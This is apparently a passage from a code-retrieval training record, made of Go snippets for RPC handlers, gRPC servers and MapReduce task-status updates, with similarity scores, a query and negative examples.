d.Decode(&request); err != nil {\n\t\t\tbadRequest(\"error decoding request string: \" + err.Error())\n\t\t\treturn\n\t\t}\n\t}\n\n\tif len(service) == 0 {\n\t\tbadRequest(\"invalid service\")\n\t\treturn\n\t}\n\n\tif len(endpoint) == 0 {\n\t\tbadRequest(\"invalid endpoint\")\n\t\treturn\n\t}\n\n\t// create request/response\n\tvar response json.RawMessage\n\tvar err error\n\t// TODO stack\n\treq := rpc.opts.Client.NewRequest(service, endpoint, request, client.WithContentType(\"application/json\"))\n\t// req := client.DefaultClient.NewRequest(service, endpoint, request, client.WithContentType(\"application/json\"))\n\n\t// create context\n\tctx := helper.RequestToContext(r)\n\n\tvar opts []client.CallOption\n\n\ttimeout, _ := strconv.Atoi(r.Header.Get(\"Timeout\"))\n\t// set timeout\n\tif timeout > 0 {\n\t\topts = append(opts, client.WithRequestTimeout(time.Duration(timeout)*time.Second))\n\t}\n\n\t// remote call\n\tif len(address) > 0 {\n\t\topts = append(opts, client.WithAddress(address))\n\t}\n\n\t// remote call\n\t// TODO stack\n\terr = rpc.opts.Client.Call(ctx, req, &response, opts...)\n\t// err = client.DefaultClient.Call(ctx, req, &response, opts...)\n\tif err != nil {\n\t\tce := errors.Parse(err.Error())\n\t\tswitch ce.Code {\n\t\tcase 0:\n\t\t\t// assuming it's totally screwed\n\t\t\tce.Code = 500\n\t\t\tce.Id = \"stack.rpc\"\n\t\t\tce.Status = http.StatusText(500)\n\t\t\tce.Detail = \"error during request: \" + ce.Detail\n\t\t\tw.WriteHeader(500)\n\t\tdefault:\n\t\t\tw.WriteHeader(int(ce.Code))\n\t\t}\n\t\tw.Write([]byte(ce.Error()))\n\t\treturn\n\t}\n\n\tb, _ := response.MarshalJSON()\n\tw.Header().Set(\"Content-Length\", strconv.Itoa(len(b)))\n\tw.Write(b)\n}", "func main() {\n\tlog.Printf(\"grpc-ping: starting server...\")\n\n\t//Get env vars\n\t//Can be passed in at command line PORT=9090 or in code\n\tport := os.Getenv(\"PORT\")\n\t//if no port set to 8080\n\tif port == \"\" {\n\t\tport = \"8080\"\n\t\tlog.Printf(\"Defaulting to port %s\", port)\n\t}\n\n\t//Creates a TCP listener on port you want\n\t//gRPC uses HTTP/2, which multiplexes multiple calls on a single TCP connection. All gRPC calls over that connection go to one endpoint\n\tlistener, err := net.Listen(\"tcp\", \":\"+port)\n\tif err != nil {\n\t\tlog.Fatalf(\"net.Listen: %v\", err)\n\t}\n\n\n\t//creates a new gRPC server with a server service which can be called via an API\n\t//attach the Ping service to the server\n\t//Remember server implements service interface to create API that can be called - PingServiceServer interface\n\t//RegisterService registers a service and its implementation to the gRPC server. - Server API ready for calls\n\tgrpcServer := grpc.NewServer()\n\tpb.RegisterPingServiceServer(grpcServer, &pingService{})\n\tif err = grpcServer.Serve(listener); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func main() {\n\n\tlis ,err := net.Listen(\"tcp\",fmt.Sprintf(\":%d\", 1368))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tserver := grpc.NewServer()\n\trpc.RegisterUserServiceServer(server, &service.UserService{})\n\n\terr = server.Serve(lis)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (s *Server) RPC(method string, reply interface{}) error {\n\tcodec := &inmemCodec{\n\t\tmethod: method,\n\t\treply: reply,\n\t}\n\tif err := s.rpcServer.ServeRequest(codec); err != nil {\n\t\treturn err\n\t}\n\treturn codec.err\n}", "func main() {\n\n\tvar listenPort = flag.Int(\"lp\", 8081, \"Thrift Listening port\")\n\tvar listenIp = flag.String(\"li\", \"0.0.0.0\", \"Listening interface\")\n\tvar backendPort = flag.Int(\"bp\", 4001, \"Etcd Service port\")\n\tvar backendIp = flag.String(\"bi\", \"127.0.0.1\", \"Etcd Service addr\")\n\tvar logDest = flag.String(\"log\", \"-\", \"Logging destination file, '-' for STDOUT\")\n\tvar debug = flag.Bool(\"debug\", false, \"enable debug\")\n\tflag.Parse()\n\n\tlogger = common.GetLogger(*logDest, *debug)\n\tlogger.Print(\"Starting Backend Processor\")\n\tlogger.Printf(\"Thrift Listening: %s:%d\\t\\tEtcd Service: %s:%d\\n\", *listenIp, *listenPort, *backendIp, *backendPort)\n\n\terr := runServer(listenIp, listenPort, backendIp, backendPort, debug)\n\tif err != nil {\n\t\tlogger.Printf(\"Failed to start Thrift service: %s\\n\", err)\n\t}\n}", "func (m Manager)alluxioWorkerHandle (workerCtx *WorkerContext) {\n\tlogger := workerCtx.logger\n\n\tvar rsp AlluxioWebResponse\n\tbaseResp := BaseResponse {\n\t\tErrCode: ErrCodeOk,\n\t\tErrInfo: ErrInfoOk,\n\t\tMoreInfo: \"\",\n\t}\n\n\twebRequst := workerCtx.workerRequest.Body.(AlluxioWebRequest)\n\tfileID := \"\"\n\n\tswitch workerCtx.workerRequest.Type {\n\tcase RequestAlluxioCreateUser :\n\t\tlogger.Infof(\"Guid:%s, begin to handle create usr info\", workerCtx.workerRequest.GUID)\n\n\t\terr := m.alluxioCreateUser(workerCtx)\n\n\t\tif err != nil {\n\t\t\tbaseResp.ErrCode = ErrCodeAllocateResFail\n\t\t\tbaseResp.ErrInfo = ErrInfoAllocateResFail\n\t\t\tbaseResp.MoreInfo = fmt.Sprintf(\"Err: %s\", err)\n\t\t}\n\n\tcase RequestAlluxioDeleteUser :\n\t\tlogger.Infof(\"Guid:%s, begin to handle create usr info\", workerCtx.workerRequest.GUID)\n\n\t\terr := m.alluxioDeleteUser(workerCtx)\n\n\t\tif err != nil {\n\t\t\tbaseResp.ErrCode = ErrCodeDeleteResFail\n\t\t\tbaseResp.ErrInfo = ErrInfoDeleteResFail\n\t\t\tbaseResp.MoreInfo = fmt.Sprintf(\"Err: %s\", err)\n\t\t}\n\n\tcase RequestAlluxioDeleteFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle delete file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioDeleteFile(workerCtx)\n\n\n\tcase RequestAlluxioRenameFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle rename file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioRenameFile(workerCtx)\n\tcase RequestAlluxioUploadFile:\n\t\tlogger.Infof(\"Guid:%s, begin to handle upload file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioUploadFile(workerCtx)\n\tcase RequestAlluxioReadFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle read file\", workerCtx.workerRequest.GUID)\n\t\tm.alluxioReadFile(workerCtx)\n\n\t/*****************following cases were not used*********************/\n\n\tcase RequestAlluxioOpenFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle open file\", workerCtx.workerRequest.GUID)\n\n\t\tfileID, baseResp = m.alluxioOpenFile(workerCtx)\n\n\tcase RequestAlluxioReadContent :\n\t\tlogger.Infof(\"Guid:%s, begin to handle read content\", workerCtx.workerRequest.GUID)\n\n\t\t//body, baseResp = m.alluxioReadContent(workerCtx)\n\n\tcase RequestAlluxioCreateFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle create file\", workerCtx.workerRequest.GUID)\n\n\t\tfileID, baseResp = m.alluxioCreateFile(workerCtx)\n\n\tcase RequestAlluxioWriteContent :\n\t\tlogger.Infof(\"Guid:%s, begin to handle write content\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioWriteContent(workerCtx)\n\n\tcase RequestAlluxioCloseFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle close file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioCloseFile(workerCtx)\n\n\tdefault:\n\t\tbaseResp.ErrCode = ErrCodeGeneral\n\t\tbaseResp.ErrInfo = \"the Method is not matched\"\n\t}\n\n\trsp = AlluxioWebResponse {\n\t\tBaseResponse: baseResp,\n\t\tGUID : webRequst.GUID,\n\t\tFileID: fileID,\n\t}\n\n\tm.workerSendRsp(workerCtx, rsp)\n}", "func (Executor) ServeHTTP(w http.ResponseWriter, req *http.Request) {\n\tlogger.Logging(logger.DEBUG, \"receive msg\", req.Method, req.URL.Path)\n\tdefer logger.Logging(logger.DEBUG, \"OUT\")\n\n\tswitch reqUrl := req.URL.Path; {\n\tdefault:\n\t\tlogger.Logging(logger.DEBUG, \"Unknown URL\")\n\t\tcommon.MakeErrorResponse(w, errors.NotFoundURL{reqUrl})\n\n\tcase !(strings.Contains(reqUrl, (url.Base()+url.Management())) ||\n\t\tstrings.Contains(reqUrl, (url.Base()+url.Monitoring())) ||\n\t\tstrings.Contains(reqUrl, (url.Base()+url.Notification()))):\n\t\tlogger.Logging(logger.DEBUG, \"Unknown URL\")\n\t\tcommon.MakeErrorResponse(w, errors.NotFoundURL{reqUrl})\n\n\tcase strings.Contains(reqUrl, url.Unregister()):\n\t\thealthAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Management()) &&\n\t\tstrings.Contains(reqUrl, url.Apps()):\n\t\tdeploymentAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Resource()):\n\t\tresourceAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Configuration()):\n\t\tconfigurationAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Device()):\n\t\tdeviceAPIExecutor.Handle(w, req)\n\n\tcase strings.Contains(reqUrl, url.Notification()):\n\t\tnotificationAPIExecutor.Handle(w, req)\n\t}\n}", "func (c *Client) rpc(method, u string, req, resp interface{}) (*http.Response, error) {\n\tvar r io.Reader\n\tvar contentType string\n\tswitch req := req.(type) {\n\tcase nil:\n\tcase io.Reader:\n\t\tr = req\n\tcase url.Values:\n\t\tr = strings.NewReader(req.Encode())\n\t\tcontentType = \"application/x-www-form-urlencoded\"\n\tdefault:\n\t\tb, err := json.Marshal(req)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tr = bytes.NewReader(b)\n\t\tcontentType = \"application/json\"\n\t}\n\n\threq, err := http.NewRequest(method, u, r)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif contentType != \"\" {\n\t\threq.Header.Set(\"Content-Type\", contentType)\n\t}\n\n\thresp, err := c.Do(hreq)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer hresp.Body.Close()\n\tif hresp.StatusCode/100 != 2 {\n\t\treturn nil, StatusError(hresp.StatusCode)\n\t}\n\tswitch body := resp.(type) {\n\tcase nil:\n\tcase io.Writer:\n\t\t_, err = io.Copy(body, hresp.Body)\n\tdefault:\n\t\terr = json.NewDecoder(hresp.Body).Decode(body)\n\t}\n\treturn hresp, err\n}", "func run() error {\n\tlistenOn := \"127.0.0.1:8080\"\n\tlistener, err := net.Listen(\"tcp\", listenOn)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to listen on %s: %w\", listenOn, err)\n\t}\n\n\tserver := grpc.NewServer()\n\tuserv1.RegisterUserServiceServer(server, &userServiceServer{})\n\tlog.Println(\"Listening on\", listenOn)\n\n\tif err := server.Serve(listener); err != nil {\n\t\treturn fmt.Errorf(\"failed to serve gRPC server: %w\", err)\n\t}\n\n\treturn nil\n}", "func main() {\n\t// ---------------------------------------------------------\n\t// initialize the gRPC instance\n\tfunctionsToImp := []string{\"store_data\", \"read_data\"}\n\twasmLocation := \"../wasm_module/storage_application.wasm\"\n\tdirs := make(map[string]string)\n\tdirs[\"./data\"] = \".\"\n\n\tdir, err := ioutil.TempDir(\"\", \"out\")\n\tcheck(err)\n\tdefer os.RemoveAll(dir)\n\tstdoutPath := filepath.Join(dir, \"stdout\")\n\n\tfuncs, mem := WasmInstantiate(functionsToImp, wasmLocation, dirs, stdoutPath, \"\", \"\")\n\n\t// -------------------------------------------------------------------------\n\t// initialize the grpc server\n\tserver := NewStorageServer(funcs, mem)\n\tlis, err := net.Listen(\"tcp\", server.port)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tgrpcServer := grpc.NewServer()\n\n\tpb.RegisterStorageServer(grpcServer, server)\n\tfmt.Printf(\"Server is running at %v.\\n\", server.port)\n\n\tif err := grpcServer.Serve(lis); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func main() {\n\tlog.Info(\"Starting up REST interface on port 8000\")\n\n\trouter := mux.NewRouter()\n\t// Instrument the /webhook endpoint for prometheus instrumentation\n\trouter.HandleFunc(\"/webhook\", prometheus.InstrumentHandlerFunc(\"webhook\", SendXrayMessage))\n\trouter.HandleFunc(\"/webhook\", SendXrayMessage).Methods(\"POST\")\n\trouter.Handle(\"/metrics\", promhttp.Handler())\n\tlog.Fatal(http.ListenAndServe(\":8000\", router))\n}", "func (d *Data) DoRPC(req datastore.Request, reply *datastore.Response) error {\n\tswitch req.TypeCommand() {\n\tcase \"set-nextlabel\":\n\t\tif len(req.Command) < 5 {\n\t\t\treturn fmt.Errorf(\"poorly formatted set-nextlabel command, see command-line help\")\n\t\t}\n\n\t\t// Parse the request\n\t\tvar uuidStr, dataName, cmdStr, labelStr string\n\t\treq.CommandArgs(1, &uuidStr, &dataName, &cmdStr, &labelStr)\n\n\t\tuuid, _, err := datastore.MatchingUUID(uuidStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tdataservice, err := datastore.GetDataByUUIDName(uuid, dvid.InstanceName(dataName))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlmData, ok := dataservice.(*Data)\n\t\tif !ok {\n\t\t\treturn fmt.Errorf(\"instance %q of uuid %s was not a labelmap instance\", dataName, uuid)\n\t\t}\n\n\t\tnextLabelID, err := strconv.ParseUint(labelStr, 10, 64)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := lmData.SetNextLabelStart(nextLabelID); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\treply.Text = fmt.Sprintf(\"Set next label ID to %d.\\n\", nextLabelID)\n\t\treturn nil\n\n\tcase \"load\":\n\t\tif len(req.Command) < 5 {\n\t\t\treturn fmt.Errorf(\"poorly formatted load command, see command-line help\")\n\t\t}\n\t\t// Parse the request\n\t\tvar uuidStr, dataName, cmdStr, offsetStr string\n\t\tfilenames, err := req.FilenameArgs(1, &uuidStr, &dataName, &cmdStr, &offsetStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif len(filenames) == 0 {\n\t\t\treturn fmt.Errorf(\"need to include at least one file to add: %s\", req)\n\t\t}\n\n\t\toffset, err := dvid.StringToPoint(offsetStr, \",\")\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"illegal offset specification: %s: %v\", offsetStr, err)\n\t\t}\n\n\t\tvar addedFiles string\n\t\tif len(filenames) == 1 {\n\t\t\taddedFiles = filenames[0]\n\t\t} else {\n\t\t\taddedFiles = fmt.Sprintf(\"filenames: %s [%d more]\", filenames[0], len(filenames)-1)\n\t\t}\n\t\tdvid.Debugf(addedFiles + \"\\n\")\n\n\t\tuuid, versionID, err := datastore.MatchingUUID(uuidStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err = datastore.AddToNodeLog(uuid, []string{req.Command.String()}); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tgo func() {\n\t\t\tif err = d.LoadImages(versionID, offset, filenames); err != nil {\n\t\t\t\tdvid.Errorf(\"Cannot load images into data instance %q @ node %s: %v\\n\", dataName, uuidStr, err)\n\t\t\t}\n\t\t\tif err := datastore.SaveDataByUUID(uuid, d); err != nil {\n\t\t\t\tdvid.Errorf(\"Could not store metadata changes into data instance %q @ node %s: %v\\n\", dataName, uuidStr, err)\n\t\t\t}\n\t\t}()\n\t\treply.Text = fmt.Sprintf(\"Asynchronously loading %d files into data instance %q @ node %s (errors will be printed in server log) ...\\n\", len(filenames), dataName, uuidStr)\n\t\treturn nil\n\n\tcase \"composite\":\n\t\tif len(req.Command) < 6 {\n\t\t\treturn fmt.Errorf(\"poorly formatted composite command. See command-line help\")\n\t\t}\n\t\treturn d.createComposite(req, reply)\n\n\tcase \"dump\":\n\t\tif len(req.Command) < 6 {\n\t\t\treturn fmt.Errorf(\"poorly formatted dump command. See command-line help\")\n\t\t}\n\t\t// Parse the request\n\t\tvar uuidStr, dataName, cmdStr, dumpType, outPath string\n\t\treq.CommandArgs(1, &uuidStr, &dataName, &cmdStr, &dumpType, &outPath)\n\n\t\tuuid, v, err := datastore.MatchingUUID(uuidStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// Setup output file\n\t\tf, err := os.OpenFile(outPath, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0755)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tswitch dumpType {\n\t\tcase \"svcount\":\n\t\t\tgo d.writeSVCounts(f, outPath, v)\n\t\t\treply.Text = fmt.Sprintf(\"Asynchronously writing supervoxel counts for data %q, uuid %s to file: %s\\n\", d.DataName(), uuid, outPath)\n\t\tcase \"mappings\":\n\t\t\tgo d.writeFileMappings(f, outPath, v)\n\t\t\treply.Text = fmt.Sprintf(\"Asynchronously writing mappings for data %q, uuid %s to file: %s\\n\", d.DataName(), uuid, outPath)\n\t\tcase \"indices\":\n\t\t\tgo d.writeIndices(f, outPath, v)\n\t\t\treply.Text = fmt.Sprintf(\"Asynchronously writing label indices for data %q, uuid %s to file: %s\\n\", d.DataName(), uuid, outPath)\n\t\tdefault:\n\t\t}\n\t\treturn nil\n\n\tdefault:\n\t\treturn fmt.Errorf(\"unknown command. Data type '%s' [%s] does not support '%s' command\",\n\t\t\td.DataName(), d.TypeName(), req.TypeCommand())\n\t}\n}", "func (s *UserClient) RpcInvoke(req []byte) ([]byte, error) {\n\t// rpc.send\n\terr := s.rpc.Send(req)\n\tif nil != err {\n\t\treturn nil, err\n\t}\n\n\t// rpc.receive\n\treturn s.rpc.Receive()\n}", "func main() {\n\n\terr := godotenv.Load()\n\tif err != nil {\n\t\tlog.Println(\"ERROR : \", err)\n\t}\n\tr := Routers.SetupRouter()\n\n\tport := os.Getenv(\"port\")\n\n\t// For run on requested port\n\tif len(os.Args) > 1 {\n\t\treqPort := os.Args[1]\n\t\tif reqPort != \"\" {\n\t\t\tport = reqPort\n\t\t}\n\t}\n\n\tif port == \"\" {\n\t\tport = \"8080\" //localhost\n\t}\n\ttype Job interface {\n\t\tRun()\n\t}\n\n\terr = r.Run(\":\" + port)\n\tif err != nil {\n\t\tlog.Println(\"ERROR\")\n\t}\n\n\n\n}", "func main() {\n\tprefix := \"/api/v1/\"\n\thttp.HandleFunc(prefix+\"quote/\", handleQuote)\n\t// TODO: Register handler\n\thttp.HandleFunc(\"/\", hello)\n\n\terr := http.ListenAndServe(\"localhost:8000\", nil)\n\n\tif err != nil {\n\t\tlog.Fatalln(\"ListenAndServe:\", err)\n\t}\n}", "func main() {\n\tclient, err := database.NewClient(\"\")\n\tif err != nil {\n\t\tlog.Fatal(\"problem connecting to the database\")\n\t}\n\tpathHandlers := handlers.NewHandler(client)\n\tr := mux.NewRouter()\n\t// Routes consist of a path and a handler function.\n\tr.HandleFunc(\"/\", pathHandlers.HelloWorld)\n\tr.HandleFunc(\"/health\", pathHandlers.HealthCheckHandler)\n\tr.HandleFunc(\"/v1/metrics/node/{nodename}\", pathHandlers.NodeHandler).Methods(\"POST\")\n\tr.HandleFunc(\"/v1/metrics/nodes{nodename}/process/{processname}\", pathHandlers.NodeHandler).Methods(\"POST\")\n\tr.HandleFunc(\"/v1/analytics/nodes/average\", pathHandlers.AnalyticsNodesHandler).Methods(\"GET\")\n\tr.HandleFunc(\"/v1/analytics/processes\", pathHandlers.AnalyticProcessesHandler).Methods(\"GET\")\n\tr.HandleFunc(\"/v1/analytics/processes/{processname}\", pathHandlers.AnalyticSpecificProcessHandler).Methods(\"GET\")\n\n\t// Bind to a port and pass our router in\n\tlog.Fatal(http.ListenAndServe(\":8000\", r))\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\tfor true {\n\t\treply := caller(requestJob)\n\t\tjobType := reply.JobType\n\t\tswitch jobType {\n\t\tcase (mapJob):\n\t\t\tmapCall(&reply, mapf)\n\t\tcase (noJob):\n\t\t\tfmt.Println(\"No task recieved\")\n\t\t\ttime.Sleep(time.Millisecond * 50)\n\t\tcase (finishAllJobs):\n\t\t\treturn\n\t\t}\n\t}\n}" ]
[ "0.7160002", "0.6427018", "0.6401158", "0.6393349", "0.6337075", "0.6300134", "0.6243808", "0.62327254", "0.62239456", "0.6219964", "0.6070592", "0.60639507", "0.6063026", "0.60481477", "0.6038316", "0.6027173", "0.60211265", "0.60112995", "0.60013", "0.59859306", "0.59594935", "0.59197164", "0.5912716", "0.5910399", "0.59078795", "0.59010166", "0.58976495", "0.58924335", "0.58916926", "0.58906996", "0.58521205", "0.5847939", "0.5840268", "0.5836651", "0.5830724", "0.58301365", "0.5824757", "0.5822927", "0.58030236", "0.5799446", "0.57946837", "0.57858735", "0.5783297", "0.57819855", "0.5778722", "0.5777676", "0.5771997", "0.5761767", "0.57538396", "0.57531095", "0.5742131", "0.5735534", "0.573448", "0.5734252", "0.57322764", "0.57313615", "0.57282954", "0.5719034", "0.57141507", "0.57015896", "0.569698", "0.5683276", "0.5673445", "0.56663793", "0.565981", "0.5650282", "0.56465733", "0.5645875", "0.56384397", "0.56362754", "0.5632953", "0.56104517", "0.56067795", "0.5604614", "0.55943125", "0.5589522", "0.55880064", "0.5581294", "0.5580471", "0.55396825", "0.55386907", "0.5535882", "0.55345005", "0.5525044", "0.5517865", "0.5501614", "0.55004555", "0.549948", "0.5497864", "0.5485914", "0.5481321", "0.5480167", "0.5469845", "0.5464283", "0.546253", "0.5457559", "0.5451173", "0.54381424", "0.5435126", "0.5430962", "0.5429263" ]
0.0
-1
UpdateTaskStatus change task status when task done or error
func (m *Master) UpdateMapTaskStatus(args *UpdateStatusRequest, reply *UpdateStatusReply) error { defer func() { if err := recover(); err != nil { log.Println("work failed:", err) reply.Err = fmt.Sprintf("%s", err) } }() m.mu.Lock() defer m.mu.Unlock() if args.Status == SUCCESS { for _, record := range m.tasks[args.TaskID] { record.status = SUCCESS m.successCounter++ } if m.successCounter >= len(m.files) { m.phase = TaskReduceType log.Println("All Map task have done , let we entry reduce phase!") } } else if args.Status == FAILED { //TODO add to failed list } else { return &argError{args.Status, "map task just return success or failed"} } return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (context Context) UpdateTaskStatus(id string, status string, statusMessage string) (err error) {\n\t_, err = context.UpdateTask(id, F{\"status\": status, \"status-message\": statusMessage})\n\treturn\n}", "func (s *Service) UpdateTaskStatus(c context.Context, date string, typ int, status int) (err error) {\n\t_, err = s.dao.UpdateTaskStatus(c, date, typ, status)\n\treturn\n}", "func UpdateTaskStatus(tid int64, new_status int64) {\n\tvar dummy string\n\n\tif new_status == Running {\n\t\tdb.QueryRow(\"UPDATE tasks SET status=$1, start_time=now() WHERE id=$2\",\n\t\t\tnew_status, tid).Scan(&dummy)\n\t} else if new_status == Canceled {\n\t\tdb.QueryRow(\"UPDATE tasks SET status=$1, end_time=now() WHERE id=$2\",\n\t\t\tnew_status, tid).Scan(&dummy)\n\t} else {\n\t\tdb.QueryRow(\"UPDATE tasks SET status=$1 WHERE id=$2\", new_status, tid).\n\t\t\tScan(&dummy)\n\t}\n}", "func (e *bcsExecutor) updateTaskStatus(taskId string, status types.TaskStatus, msg string) {\n\tvar state mesos.TaskState\n\n\tswitch status {\n\tcase types.TaskStatusStarting:\n\t\tstate = mesos.TaskState_TASK_STARTING\n\n\tcase types.TaskStatusRunning:\n\t\tstate = mesos.TaskState_TASK_RUNNING\n\n\tcase types.TaskStatusKilling:\n\t\tstate = mesos.TaskState_TASK_KILLING\n\n\tcase types.TaskStatusFinish:\n\t\tstate = mesos.TaskState_TASK_FINISHED\n\n\tcase types.TaskStatusFailed:\n\t\tstate = mesos.TaskState_TASK_FAILED\n\n\tcase types.TaskStatusError:\n\t\tstate = mesos.TaskState_TASK_ERROR\n\n\tdefault:\n\t\tblog.Errorf(\"task %s status %s is invalid\", taskId, string(status))\n\t\treturn\n\t}\n\n\tupdate := &mesos.TaskStatus{\n\t\tTaskId: &mesos.TaskID{Value: proto.String(taskId)},\n\t\tState: state.Enum(),\n\t\tMessage: proto.String(msg),\n\t\tSource: mesos.TaskStatus_SOURCE_EXECUTOR.Enum(),\n\t}\n\n\tID := uuid.NewUUID()\n\tnow := float64(time.Now().Unix())\n\tupdate.Timestamp = proto.Float64(now)\n\tupdate.Uuid = ID\n\n\tFunc, ok := e.callbackFuncs[types.CallbackFuncUpdateTask]\n\tif !ok {\n\t\tblog.Errorf(\"CallbackFuncUpdateTask not found\")\n\t\treturn\n\t}\n\n\tblog.Infof(\"update task %s status %s uuid %s msg %s\", taskId, state.String(), ID.String(), msg)\n\n\te.updatesLocks.Lock()\n\te.ackUpdates[taskId] = update\n\te.updatesLocks.Unlock()\n\n\tupdateFunc := Func.(types.UpdateTaskFunc)\n\terr := updateFunc(update)\n\tif err != nil {\n\t\tblog.Errorf(\"update task %s status %s msg %s error %s\", taskId, state.String(), msg, err.Error())\n\t}\n\treturn\n}", "func (t *Task) updateStatus() {\n\tb, err := json.Marshal(&map[string]interface{}{\n\t\t\"type\": \"update\",\n\t\t\"start\": t.Desc.Start,\n\t\t\"end\": t.Desc.End,\n\t\t\"status\": t.Desc.Status,\n\t})\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\torm.UpdateTask(&t.Desc)\n\tsockets.Message(t.Desc.ID, b)\n}", "func (s *taskService) SetTaskStatus(c context.Context, typ int, date string, err error) (int64, error) {\n\tif err != nil {\n\t\treturn s.setTaskFail(c, typ, date, err.Error())\n\t}\n\treturn s.setTaskSuccess(c, typ, date, \"success\")\n}", "func UpdateOneTimeTaskStatus(otid int64, status int) error {\n\tvar dummy string\n\tif err := db.QueryRow(\"UPDATE onetime_tasks SET status=$1 WHERE id=$2 \"+\n\t\t\"RETURNING id\", status, otid).Scan(&dummy); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (i *DeleteOrUpdateInvTask) StatusUpdate(_ *taskrunner.TaskContext, _ object.ObjMetadata) {}", "func UpdateEventTaskStatus(etid int64, status int) error {\n\tvar dummy string\n\tif err := db.QueryRow(\"UPDATE event_tasks SET status=$1 WHERE id=$2 \"+\n\t\t\"RETURNING id\", status, etid).Scan(&dummy); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *Server) updateTaskStatus(msg message.Message, status models.State, db *database.DataStore) error {\n\tselector := bson.M{\"$and\": []bson.M{\n\t\tbson.M{\"ulid\": msg.ULID},\n\t\tbson.M{\"tasks\": bson.M{\"$elemMatch\": bson.M{\"task_id\": msg.TaskID}}}}}\n\tupdate := bson.M{\"$set\": bson.M{\"tasks.$.status\": status}}\n\tif status == models.Failed {\n\t\tlog.Errorf(\"[%s] %s\", msg.ULID, errors.Errors[msg.ErrorID])\n\t\ts.saveErr(msg.ULID, msg.TaskID, msg.ErrorID, db)\n\t}\n\treturn db.C(models.Schedules).Update(selector, update)\n}", "func (s *eremeticScheduler) StatusUpdate(driver sched.SchedulerDriver, status *mesos.TaskStatus) {\n\tid := status.TaskId.GetValue()\n\n\tlog.Debugf(\"Received task status [%s] for task [%s]\", status.State.String(), id)\n\n\ttask, err := database.ReadTask(id)\n\tif err != nil {\n\t\tlog.Debugf(\"Error reading task from database: %s\", err)\n\t}\n\n\tif task.ID == \"\" {\n\t\ttask = types.EremeticTask{\n\t\t\tID: id,\n\t\t\tSlaveId: status.SlaveId.GetValue(),\n\t\t}\n\t}\n\n\tif !task.IsRunning() && *status.State == mesos.TaskState_TASK_RUNNING {\n\t\tTasksRunning.Inc()\n\t}\n\n\tif types.IsTerminal(status.State) {\n\t\tTasksTerminated.With(prometheus.Labels{\"status\": status.State.String()}).Inc()\n\t\tif task.WasRunning() {\n\t\t\tTasksRunning.Dec()\n\t\t}\n\t}\n\n\ttask.UpdateStatus(types.Status{\n\t\tStatus: status.State.String(),\n\t\tTime: time.Now().Unix(),\n\t})\n\n\tif *status.State == mesos.TaskState_TASK_FAILED && !task.WasRunning() {\n\t\tif task.Retry >= maxRetries {\n\t\t\tlog.Warnf(\"giving up on %s after %d retry attempts\", id, task.Retry)\n\t\t} else {\n\t\t\tlog.Infof(\"task %s was never running. re-scheduling\", id)\n\t\t\ttask.UpdateStatus(types.Status{\n\t\t\t\tStatus: mesos.TaskState_TASK_STAGING.String(),\n\t\t\t\tTime: time.Now().Unix(),\n\t\t\t})\n\t\t\ttask.Retry++\n\t\t\tgo func() {\n\t\t\t\tQueueSize.Inc()\n\t\t\t\ts.tasks <- id\n\t\t\t}()\n\t\t}\n\t}\n\n\tif types.IsTerminal(status.State) {\n\t\thandler.NotifyCallback(&task)\n\t}\n\n\tdatabase.PutTask(&task)\n}", "func (dtm *DfgetTaskManager) UpdateStatus(ctx context.Context, clientID, taskID, status string) error {\n\tdfgetTask, err := dtm.getDfgetTask(clientID, taskID)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif dfgetTask.Status != types.DfGetTaskStatusSUCCESS {\n\t\tdfgetTask.Status = status\n\t}\n\n\treturn nil\n}", "func SetTaskStatus(task *Task, s Status) {\n\ttask.Status = s\n}", "func UpdateScheduledTaskStatus(stid int64, status int) error {\n\tvar dummy string\n\tif err := db.QueryRow(\"UPDATE schedule_tasks SET status=$1 WHERE id=$2 \"+\n\t\t\"RETURNING id\", status, stid).Scan(&dummy); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (o *Task) SetTaskStatus(ctx context.Context, exec boil.ContextExecutor, insert bool, 